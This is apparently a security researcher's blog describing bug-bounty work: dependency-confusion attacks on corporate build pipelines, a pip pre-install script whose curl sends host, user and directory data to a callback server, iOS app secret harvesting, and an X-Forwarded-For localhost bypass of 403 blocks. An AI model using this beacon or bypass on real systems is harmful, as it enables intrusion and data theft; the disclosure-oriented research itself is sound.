How I hacked into Google’s internal corporate assets

It’s raining command injections! 

Every now and then, I take some time to work on bug bounty projects to explore threat vectors into real-world targets like Google, Tesla and many others. Doing so helps me stay aware of the fast-changing technical landscape, which is crucial for my role as a technology CISO. Plus, it’s enjoyable and provides extra income. 

On my most recent venture, I focused on open-source and supply chain attacks. Over the period of a week I discovered multiple vulnerabilities and gained control of (read: “command injection on”) numerous in-scope bug bounty assets. Gaining command injection essentially means the ability to execute arbitrary commands on an operating system (i.e. macOS, Linux, etc.) – in my case, as root or admin. I was able to run OS commands on over a thousand assets including servers, containers, CI/CD systems and developer machines. Six of these assets were Google’s internal corporate assets, many more belonged to a self-driving car company’s build CI/CD pipeline, and others I can’t share the details of. These findings were mostly critical with high impact.

Interestingly, in the case of Google, I received an honourable mention but was not awarded a bounty, as the most critical asset I compromised was a developer’s machine. In contrast, I was awarded a bounty by another company for doing just that.

How?

Today, much of our software relies on “open source software libraries” to handle specific software functions. These libraries – essentially small software packages – are freely available to the public to use, support, and maintain. They play a crucial role in speeding up and simplifying software development.

Many of the applications and software we use every day as consumers (i.e. banking apps, government services, social media, etc.) heavily depend on these open source libraries, often referred to as “dependencies”. During software development, package managers for languages such as Python and Node.js fetch these dependencies to build the software. 

Developers are familiar with commands like:

  • npm install <packagename>
  • pip install <packagename>

These dependencies can be sourced internally, from within the organization’s artifact registry, or externally, from a public registry. However, a significant issue arises when an external attacker identifies and registers a public package with the same name as one an organization uses exclusively internally.

In such cases, package managers like npm and pip can automatically retrieve the public version of the package if no internal version is available – or if the public version number is higher. If the public version is malicious, this can have immediately severe consequences for the software being targeted, for any sensitive data associated with the software, and for the customers who use the software. What’s more, these types of attacks are really hard to detect when they happen. 
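The failure mode above can be sketched in a few lines. This is a toy version-comparison rule, not the actual resolution logic of any particular package manager, and the package name is illustrative:

```python
# Sketch of the naive resolution rule described above: the public copy
# of a package wins when no internal copy exists, or when the public
# version number is higher. Real resolvers are more complex; this only
# illustrates the failure mode behind dependency confusion.

def resolves_to_public(internal_version, public_version):
    """Return True if a naive resolver would fetch the public package."""
    if public_version is None:
        return False                     # nothing published externally
    if internal_version is None:
        return True                      # only the public copy exists
    as_tuple = lambda v: tuple(int(x) for x in v.split("."))
    return as_tuple(public_version) > as_tuple(internal_version)

# An attacker publishes "companyname-regex" at an inflated version:
print(resolves_to_public("1.4.2", "99.0.0"))   # True  -> confusion
print(resolves_to_public("1.4.2", None))       # False -> internal only
```

This is why attackers publish their packages at absurdly high version numbers: it guarantees the public copy outranks whatever the organization runs internally.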

How I discovered vulnerable packages

Despite the fact that pioneers of this bug class like Alex Birsan had already mopped up Apple, Microsoft, Yelp and many other companies vulnerable to this attack, I donned my VC thinking and took a somewhat philosophical view: there were a number of fundamentals at play that, when combined, would likely still let me find and exploit these bugs and thereby secure some return on investment. These fundamentals were:

  1. It is likely that many large organizations are vulnerable to dependency confusion in some way, and I still believe this to be true even after my exploits – in fact, more so now. Although I don’t have evidence, I’ve had enough anecdotal conversations to get the impression that not many tech companies are taking an organized, risk-based approach to uplifting the security of their CI/CD pipelines. This is not something that security attestations like SOC 2 or ISO 27001 cover, but it is a critical area of risk for software development.
  2. The perceived approaches to solving this problem can needlessly impose cost on developer time or on the security budget, and this deters engineering orgs from quickly effecting remedial change in this space. In other words, it can be perceived as “hard” or “slow” to fix, which is not entirely true. Fixing this can be as simple as registering legitimate public packages under the same names – packages that contain no code but are designed to secure the namespace so it can’t be taken by others. As an aside, I went to a security conference recently where a vendor was selling a tool to solve this exact problem. You don’t need to buy a tool to solve this problem, and the encounter reinforced to me that this issue is not well understood by security teams – that is the second fundamental reason why I figured this particular endeavor worthy of some time and effort. 

Some things I observed while doing discovery:

When orgs build their own internal dependencies, these are typically named after an internal service or function that is consumed by multiple services or applications. For example, a company might have an internal dependency called “companyname-regex”. This is significant because the names of these internal dependencies can align with publicly discoverable names: names contained in functions in externally accessible code, or even the names of externally accessible APIs or services. Extending this hypothesis, developers might use names associated with core products or features. Because of this, a degree of discovering these names in public javascript and/or brute-forcing them is possible.
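The brute-forcing side of this can be sketched as a simple wordlist combination. The prefixes and suffixes below are purely illustrative, not real targets:

```python
# Sketch of the naming hypothesis above: combine a (hypothetical)
# company prefix with common internal-utility suffixes to generate
# candidate dependency names worth checking against public registries.
from itertools import product

PREFIXES = ["acme", "acme-internal"]               # illustrative prefixes
SUFFIXES = ["regex", "logger", "auth", "config",   # common utility names
            "utils", "api-client"]

def candidate_names():
    return [f"{p}-{s}" for p, s in product(PREFIXES, SUFFIXES)]

names = candidate_names()
print(len(names))    # 12 candidates from a 2 x 6 wordlist
print(names[0])      # acme-regex
```

In practice the suffix wordlist would be seeded from names actually observed in the target’s public code, which is far more effective than guessing blind.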

For me this is the scariest part because of how significant the potential is to target organizations and scale this attack up. I saw evidence from research by companies like Checkmarx, who had identified actors (unconfirmed whether malicious or not) scaling up attacks (creating hundreds of these dependencies) targeting specific companies through what seemed to be similar brute-forcing activity (guessing the names of internal services, utilities, etc).

So I set out to find some vulnerable dependencies. I did this via a number of methods:

  • Scanned hundreds of public github repositories to identify dependencies that looked like internal dependencies. 
  • Spidered and scanned javascript on websites
  • Scanned public web server directories to reveal endpoints like /package.json. 
  • Downloaded old/archived website javascript and scanned it to find references to old dependencies and old javascript functions that have since been removed over the last 5 years but could still be in use elsewhere. 
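The first of these methods can be sketched as a small manifest scanner. The prefix list and “looks internal” heuristic here are assumptions for demonstration only:

```python
# Illustrative sketch: given the text of a package.json pulled from a
# public repository, flag dependency names that look internal (scoped
# or company-prefixed). The heuristic is deliberately simple.
import json

def internal_looking_deps(package_json_text, prefixes=("companyname-",)):
    manifest = json.loads(package_json_text)
    deps = {}
    for section in ("dependencies", "devDependencies"):
        deps.update(manifest.get(section, {}))
    # Scoped (@org/...) and company-prefixed names are confusion candidates
    return sorted(name for name in deps
                  if name.startswith("@") or name.startswith(prefixes))

sample = ('{"dependencies": {"react": "^18.2.0", "@acme/auth": "1.0.0",'
          ' "companyname-regex": "^2.1.0"}}')
print(internal_looking_deps(sample))  # ['@acme/auth', 'companyname-regex']
```

Every name this flags then gets checked against the public registry; any that come back unregistered are potential confusion targets.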

Scanning tools that I used included:

  • Confused – this was used to check whether the dependency was in a public registry or not. 
  • Other than this, I wrote all of my other tools myself and used generative AI to speed up the script-writing process. The code it produced was impressive and allowed me to conduct a substantial amount of research at a far greater pace than I ordinarily would have been able to. 

Scanning techniques included:

  • Searching for dependency files in places like github (ie. package.json, dependencies.txt)
  • Searching for functions within public code on websites that refer to possible dependency names. This included:
    • import('dependency_path')
    • require('dependency_path')
    • define('module')
    • "exports=JSON.parse"
    • References to 'node_module' where dependency files are usually saved
  • Using regex to search through javascript looking for potential dependency names
    • (example: grep -Por '".*":"\^[0-9]+\.[0-9]+\.[0-9]+"' | tr ',' '\n' | awk '/".*":"\^[0-9]+\.[0-9]+\.[0-9]+"/ {print}' | sort -u)
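The same extraction idea as that grep pipeline, sketched in Python (the bundled javascript sample is made up):

```python
# Python equivalent of the grep pipeline above: extract "name": "^x.y.z"
# pairs, which often survive minification in bundled javascript.
import re

VERSION_PAIR = re.compile(r'"([^"]+)"\s*:\s*"\^(\d+\.\d+\.\d+)"')

def candidate_dependencies(js_text):
    # Deduplicate and sort the captured package names
    return sorted({name for name, _ in VERSION_PAIR.findall(js_text)})

bundled = '{"lodash":"^4.17.21","companyname-telemetry":"^0.3.1"}'
print(candidate_dependencies(bundled))
# ['companyname-telemetry', 'lodash']
```

Well-known names like lodash get filtered out immediately; the company-prefixed leftovers are what you feed into the registry check.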

How I exploited dependency confusion

Once I had identified a number of externally accessible (potential or confirmed) dependency names, getting a command injection on a server to prove the concept was conceptually straightforward but practically difficult. I won’t explain this much here – other resources exist that explain this process in more detail. 

However, in essence, a curl command in a dependency install script like the one below – once the package is installed on a target host – grabs some basic information about the host and sends it to a server. 

Bear in mind that for some programs this is actually out of scope (e.g. Yelp), but the vast majority of programs where I’ve seen this expect some form of command injection as proof – ‘or it never happened’. Always check the program scope before proceeding.

Example pip dependency preinstall script: 

import subprocess

def pre_install():
    # Beacon: report hostname, user and working directory to a callback server
    curl_command = 'curl -H "Hostname: $(hostname)" -H "Username: $(whoami)" -H "Directory name: $(pwd)" https://my-call-back-server'
    subprocess.run(curl_command, shell=True)

if __name__ == "__main__":
    pre_install()

Some things I observed while doing exploitation:

  • Organizations impacted the most were those running continuous delivery and deployment. Software with a slower development cycle wasn’t impacted as much, because with continuous delivery and deployment, artifacts are fetched regularly and automatically, so compromise within a given timeframe is much more likely. Organizations impacted by this bug are typically medium to larger software companies with scalable software architectures like Kubernetes. 
  • This also impacts developers. I’d often see developers installing my packages on their local development machines due to a general lack of awareness or vigilance around open source risks.
  • These packages are not just running software around the world; they are the hidden bedrock of our digital economy. They are literally the basis upon which commerce happens around the globe, and the provision of modern critical services such as healthcare relies on open source software in some way. All it takes is for a financially motivated criminal or an espionage operation to drop a well-targeted package into a public registry and BOOM – a malicious actor could gain control of any number of servers across any number of large organizations. Because of this, I’d love to see these registries work more closely with the bug bounty community to test evasion and detection techniques for malicious packages. 

How to optimize your hacking by understanding your mind

Over the course of my career, the limitations and capabilities of the human brain – and how these impact the tasks we perform, the choices we make and our long-term career trajectory – have been a source of great fascination for me.

When solving problems at work we rarely take a step back and consider to what extent our mind is equipped to handle a particular task. Usually we just focus on fixing the problem, not optimising the thing that is fixing the problem.

But the reality is that inside our heads, we are each equipped with a kit that contains its own incredibly unique set of limitations and strengths.

To illustrate the point, we might briefly compare the brain with a car; you don’t drive a racing car up a sand dune or race a four wheel drive against other F1 cars.

The reality is that each of us have a brain that is equipped with a varying set of cognitive abilities. Understanding your cognitive strengths and weaknesses can help improve your ability to perform your work. You can capitalise on your cognitive strengths and you can find ways to mitigate the effect of your cognitive struggle.

So what are some practical examples of this? While I’m going to provide examples which can be applied to all types of work, I’ll use hacking as the practical example.

Let’s start with executive function.

Executive function

Executive function is the cognitive process that helps us to regulate, control and manage our thoughts and actions. It includes a number of cognitive processes, but for the purpose of this post, I want to focus on only three of them.

Each of us have certain strengths and certain struggles with our executive function. These struggles can be amplified significantly for people with ASD or ADHD.

Task Initiation

Task initiation refers to the capacity to begin a task or activity, as well as independently generating ideas, responses or problem-solving strategies. People who struggle with initiation typically want to succeed at a task but can’t get started.

A great example of this is bug hunting. Hunting for bugs or exploits that allow a hacker to exploit a system is usually something people do in their spare time, so self-discipline is needed to sit down and, well… start.

I see people all the time who want to get started in bug hunting and despite all the advice out there to just “get started” some people really struggle to just get started. And for some people – those who struggle with task initiation – this is a very real issue. Usually these people are just as smart as anyone else, but the one thing holding them back is cognitive struggle encountered when initiating tasks.

I’ve seen some great initiatives within infosec at a very local level which inadvertently help people who struggle with this. Local study groups who proactively encourage beginners to join in are a great way to bridge this gap.

If on the other hand, you have no trouble initiating a task, then use it to your advantage! start a local meetup. Join an organising committee. Invite a friend who struggles with task initiation to collab with you. Initiate your work and career away.

Planning and organisation

Planning and organisation refers to a person’s ability to manage current and future-oriented task demands. Planning relates to the ability to anticipate future events, set goals and develop appropriate steps ahead of time to carry out a task or activity. Organisation relates to the ability to bring order to information and to appreciate the main ideas or key concepts when learning and communicating information.

In information security there is an array of roles that require varying levels of organisational and planning ability. It’s worth analysing your capacity to plan and organise, then aiming for a role which aligns with your capability in this area.

In the past, I’ve made the mistake of hiring someone who, while technically excellent, struggled to manage small projects. They really struggled with their ability to plan and organise. That person was able to thrive much more in an engineering context where they executed against a set of sequential instructions.

As a bug hunter, organising is helpful for reconnaissance and planning is helpful for exploitation. I’ve seen bug hunters do these things at varying levels of complexity. If planning and organisation is a strength of yours, then use it to map out a plan on how to get to your ideal role, or attack your ideal target.

On the flip side, if you struggle in this area and you want to bug-hunt, I think you are in luck – not much planning or organisation is actually needed to discover and exploit bugs.

Working memory

Working memory (not to be confused with short-term memory) is your mental sticky note or sketchpad. It’s a skill that allows us to work with information without losing track of what we’re doing. 

It describes how much working information you can store in your mind at a given time. For example, you might be storing lines of code, exploit strings, heck – even UUIDs or hashes.

How much information you hold in your working memory determines how much of the overall informational picture you can see/process at once.

Struggling with working memory might mean someone has difficulty remembering their code logic while scripting, or needs to reference documented instructions more regularly to compensate for not being able to hold them in working memory.

If you have a bigger working memory, then this is going to be particularly beneficial if you are reverse engineering, doing OSINT or building an exploit.

If you struggle with working memory you might need to consider ways to mitigate the impact of this. For example, you could work on visualisation skills. Visualising the problem requires your brain to store the information differently. Breaking big chunks of information into bite sized pieces also helps to digest information more easily.


While our executive function is made up of many cognitive processes, it is just one aspect of how our minds are equipped to handle the problems we solve each day. Many other aspects of our minds are used to solve problems, make decisions and process information.

And the more we learn about our minds, the better equipped we are to solve tasks more efficiently and do our work more effectively.

Do yourself a favour and become more effective at work – hacking or whatever you’re doing – by identifying your cognitive strengths and weaknesses and how to use these to your advantage.

Related resources

What are cognitive abilities and skills, and can we boost them?

Walking the path least trodden – hacking iOS apps at scale

This is a story of how I set out to find some bounties and how I found gold, hacking iOS apps, at scale.

One of the essential qualities of a bug hunter is the ability to find exploitable vulnerabilities that others haven’t found.

The ability to find bugs not discovered by others comes not from deep technical knowledge, but rather from creativity and innovation.

So how do you get an edge over others? Find the path least trodden.

How do you find the path least trodden? Be creative: come up with new ways to build footprint/reconnaissance on a target.

In my case, I decided to apply this concept to an area of bug bounties which usually doesn’t get as much attention as web applications: iOS apps.

I also chose iOS apps because they are closed source and not straightforward to hack. I figured that because hacking iOS apps has a price barrier to entry, as well as messy configuration, I would be working on targets which other researchers would be less likely to see. Therefore, it would be a path least trodden.

So I set out on the task: found an old iPhone, went out and purchased a MacBook, and used that to jailbreak the iPhone. Then, in order to be able to decrypt and download in-scope bug bounty apps, I had to configure a few apps.

After some tinkering, I built an end-to-end workflow, called iGold, which enabled me to hack in-scope iOS apps at scale with little manual involvement.

I wrote the workflow in bash, and it enabled me to perform two key functions:

Use case 1 (on-demand): Whenever I see a new bounty program, I can download the iOS app onto my phone, which triggers a process to automatically download and decompile the app, test API key access to databases, etc.

Use case 2 (bulk): Download hundreds of apps from various bounty platforms at once. As they are downloaded, they are automatically decompiled and tested, en masse.

The script essentially decrypts iOS applications, downloads them, decompiles them, converts plist files, performs some class dumping, runs strings on the binaries, and then starts grepping this data for specific targets like API keys, URLs, tokens, and all manner of secrets using regex. The script also tests some API keys.
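The grepping stage can be sketched as a small signature scanner. The patterns below are illustrative (real scanners ship far larger signature sets), and the sample input is fabricated:

```python
# Simplified sketch of the grepping stage: scan text dumped from an app
# binary (e.g. strings output) for secret-shaped values.
import re

SIGNATURES = {
    "aws_access_key": re.compile(r"\bAKIA[0-9A-Z]{16}\b"),
    "google_api_key": re.compile(r"\bAIza[0-9A-Za-z_\-]{35}\b"),
    "url":            re.compile(r"https?://[^\s\"']+"),
}

def scan_strings(dumped_text):
    hits = []
    for label, pattern in SIGNATURES.items():
        for match in pattern.findall(dumped_text):
            hits.append((label, match))
    return hits

sample = 'endpoint=https://api.example.com key=AKIAABCDEFGHIJKLMNOP'
for label, value in scan_strings(sample):
    print(label, value)
```

Piping every decompiled app through something like this is what makes the bulk use case viable: the manual work shrinks to triaging the hits.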

I compared my script process with some common tools like MobSF, and found that in some cases I was looking for things that MobSF was not searching for.

Because I was able to perform this recon at scale, I was able to discover a number of interesting things – which I’ll break into two categories.

  1. Secrets (as expected) – found a number of API keys which had not been discovered by others.
  2. Valuable recon about organisations which is otherwise hard/impossible to get.

I found point 2 to be of more value.

By way of example, I discovered an iOS app binary which contained an s3 bucket address. I then looked the address up and found it was public. I then identified a very suspicious looking file in this public bucket, but alas, the file was blocked/secured. I knew they had a number of private buckets, so I scanned the same file name against their private bucket and then I got a hit – it downloaded.
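The cross-bucket check can be sketched with anonymous HTTPS requests. The bucket and object names below are hypothetical, and the live loop is left commented out since it makes network calls:

```python
# Sketch of the cross-bucket check described above: take a file name
# seen in one bucket and probe for it across an organisation's other
# known buckets via anonymous HEAD requests.
import urllib.request
import urllib.error

def object_url(bucket, key):
    """Virtual-hosted-style S3 URL for an object."""
    return f"https://{bucket}.s3.amazonaws.com/{key}"

def object_is_public(bucket, key, timeout=10):
    """True if the object answers an anonymous HEAD request."""
    req = urllib.request.Request(object_url(bucket, key), method="HEAD")
    try:
        urllib.request.urlopen(req, timeout=timeout)
        return True
    except urllib.error.URLError:
        return False   # 403/404, DNS failure, or no route

# Live probe (network call), e.g.:
# for bucket in ["acme-prod-assets", "acme-internal-builds"]:
#     print(bucket, object_is_public(bucket, "suspicious-export.tar.gz"))
```

The design choice worth noting: file names leak between buckets far more often than bucket policies are kept consistent, which is exactly what the hit above exploited.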

On another occasion, I found an s3 bucket address in a binary which contained a file which, once downloaded and decompressed, contained the administrative credentials to their entire global AWS tenancy.

Often less attention is given to securing assets that are harder to find – so find the path least trodden!

Bypassing 403

A few weeks ago I came across this cool “accidental” exploit vector which was documented about 8 years ago by IRCmaxwell, and describes a way to trick servers (behind a reverse proxy or load balancer) into thinking an HTTP request which is ordinarily unauthorised is actually authorised.

I read the blog post while doing some research into the X-Forwarded-For HTTP request header and immediately identified this “accidental exploit” as a really cool use-case for applying to bug bounty targets.

To explain this exploit we need to first understand the purpose of the X-Forwarded-For request header.

The X-Forwarded-For (XFF) header is a de-facto standard header for identifying the originating IP address of a client connecting to a web server through an HTTP proxy or a load balancer. When traffic is intercepted between clients and servers, server access logs contain the IP address of the proxy or load balancer only. To see the original IP address of the client, the X-Forwarded-For request header is used.

https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Forwarded-For

This header is used and implemented in a variety of ways, and because of this, it can also be exploited in a variety of ways. Researchers often use this header to inject SQL payloads, perform proxy enumeration, spoof client IPs, trigger SSRF and many other interesting use-cases which I’ll cover later.

However the use-case that really got my attention was a variation of IP spoofing which causes the target web server to reveal information that it shouldn’t. I like to find vulnerabilities that most scanners aren’t configured to find and this I think is another one of these cases.

So IRCMaxwell experienced a situation where he unintentionally configured all of his outgoing HTTP requests to include the X-Forwarded-For header set to an IP address of 127.0.0.1 (the local host) – you can read his blog to find out how and why.

This resulted in his discovering that StackOverflow was revealing parts of an administrative console to him that should not have been available for public viewing or access.

What was happening is that once the StackOverflow server received this request, it interpreted the “X-Forwarded-For: 127.0.0.1” to mean that the webserver itself had initiated the request, and that by implication, the requestor was authorised to see all the content available at that endpoint. IRCMaxwell was effectively masquerading as the webserver itself as far as the webserver was concerned.

I thought this was a pretty cool vulnerability, and so thought about how I could apply this to bug bounty targets.

So I wrote a tool which sends numerous requests to a target address with different localhost variations of the XFF header, to accommodate cases where a WAF was blocking requests based on localhost signatures.

The tool uses heuristics to detect variations in the HTTP response that could be indicative of additional sensitive information being disclosed.
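The core of that probing logic can be sketched as follows. The header variations come from common bypass wordlists, and the diff heuristic here is deliberately simple (my assumption of a minimal version, not the tool’s actual logic):

```python
# Sketch: localhost-flavoured XFF variations (to slip past naive WAF
# signatures) plus a crude heuristic for spotting responses that differ
# from an unmodified baseline request.
XFF_VARIATIONS = ["127.0.0.1", "127.0.0.1:80", "localhost", "0.0.0.0", "::1"]

def probe_headers():
    """One header dict per request variation."""
    return [{"X-Forwarded-For": value} for value in XFF_VARIATIONS]

def looks_interesting(baseline_status, baseline_len, status, length):
    """Flag a 403 baseline that turns 200, or a noticeably larger body:
    either suggests additional content is being disclosed."""
    if baseline_status == 403 and status == 200:
        return True
    return length > baseline_len * 1.5

print(looks_interesting(403, 1200, 200, 48000))  # True: the 403 lifted
```

In the real tool, each candidate hit still needs manual review, since many applications echo the XFF value back or vary responses for unrelated reasons.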

As I developed this tool and scanned across hundreds of bug bounty targets I began to discover some interesting nuances. Web applications would handle and respond to XFF input very differently, resulting in some unexpected bug bounty leads.

However, the biggest win came early in the scanning, when the tool discovered an admin console on a subdomain that was blocked to the public (response code 403) – until you sent it an HTTP request with an XFF header set to 127.0.0.1:80, at which point the admin console became accessible.

After writing up the report – demonstrating the impact – it occurred to me that the same issue might occur on other subdomains of the parent domains.

After some searching I realised that not one subdomain, but two, no wait… over 800 subdomains for this particular organisation were impacted by the same issue. Each of these subdomains contained web applications, APIs or other services which were normally blocked to public access, but were bypassable using this technique!